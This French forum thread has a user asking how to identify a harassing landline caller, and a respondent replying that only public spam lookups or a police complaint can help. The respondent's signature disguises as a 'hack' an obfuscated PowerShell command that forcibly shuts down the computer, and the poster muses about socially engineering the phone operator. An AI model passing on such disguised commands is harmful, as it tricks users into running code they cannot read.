Annonce

Réduire
Aucune annonce.

Identifier un numéro de téléphone fixe.

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Identifier un numéro de téléphone fixe.

    Bonjour,

    Aujourd'hui je cherche de l'aide pour savoir si c'est possible d'identifier un numéro de téléphone qui appelle chez moi sur mon téléphone fixe.
    En effet depuis quelques jours je me fais harceler par le même numéro qui appelle et quand on décroche et bien ça raccroche.
    Je pense c'est une vengeance car j'ai renvoyer bouler une meuf qui essayer de m'arnaquer on va dire pour des factures d'électricité !

    Donc j'aurai aimer savoir si c'était possible d'avoir plus de renseignements sur cette entreprise qui m'appelle jour et nuit et sans chercher le numéro sur internet. Je pensais à un tool sur mon pc qui pourrait renvoyer l'appel sur mon pc ou alors intercepter l'appel à partir de mon pc.

    Je sais j'ai une plateforme Orange pour voir qui m'appelle etc mais ça m'intéresse pas.

    Thank's, en espérant que vous avez compris ma demande

  • #2
    ,
    et sans chercher le numéro sur internet
    Pourquoi pas ?

    Je pensais à un tool sur mon pc qui pourrait renvoyer l'appel sur mon pc ou alors intercepter l'appel à partir de mon pc.
    Je comprend pas ce que tu penses que ça pourra t'apporter de plus.
    Hack like a pro :
    PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

    Commentaire


    • #3
      Bah je cherche à dévier l'appel qu'il m'envoie vers mon pc du fixe, en gros pouvoir analyser le numéro depuis mon poste

      Commentaire


      • #4
        analyser le numéro depuis mon poste
        Bah en fait c'est ça le truc. Ya rien à analyser que tu ne puisses déjà faire avec un copier / coller du numéro dans google /...

        Ya aucune magie derrière un appel téléphonique. Aucune info particulière n'est transmise avec l'appel (nom, adresse ou autre du détenteur de la ligne). Uniquement les numéros appelant / appelé, et si t'es en IP (Box), t'auras l'IP du SIP registrar de ton opérateur.

        Ton problème est simple : soit le numéro a déjà été signalé comme malveillant / spam sur des bases publiques (cf google). Soit c'est pas le cas, et dans ce cas là il faut que tu portes plaintes car tu n'es pas habilité à faire de demande d'information de ce type auprès des opérateurs téléphoniques / ARCEP.
        -> https://www.service-public.fr/partic...sdroits/F32235


        Hack like a pro :
        PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

        Commentaire


        • #5
          Envoyé par Krisscool Voir le message
          Bah en fait c'est ça le truc. Ya rien à analyser que tu ne puisses déjà faire avec un copier / coller du numéro dans google /...

          Ya aucune magie derrière un appel téléphonique. Aucune info particulière n'est transmise avec l'appel (nom, adresse ou autre du détenteur de la ligne). Uniquement les numéros appelant / appelé, et si t'es en IP (Box), t'auras l'IP du SIP registrar de ton opérateur.

          Ton problème est simple : soit le numéro a déjà été signalé comme malveillant / spam sur des bases publiques (cf google). Soit c'est pas le cas, et dans ce cas là il faut que tu portes plaintes car tu n'es pas habilité à faire de demande d'information de ce type auprès des opérateurs téléphoniques / ARCEP.
          -> https://www.service-public.fr/partic...sdroits/F32235


          Merci de ton aide, alors
          Ceci dit je peux toujours faire du social engineering auprès de mon opérateur

          Commentaire

          Chargement...
          X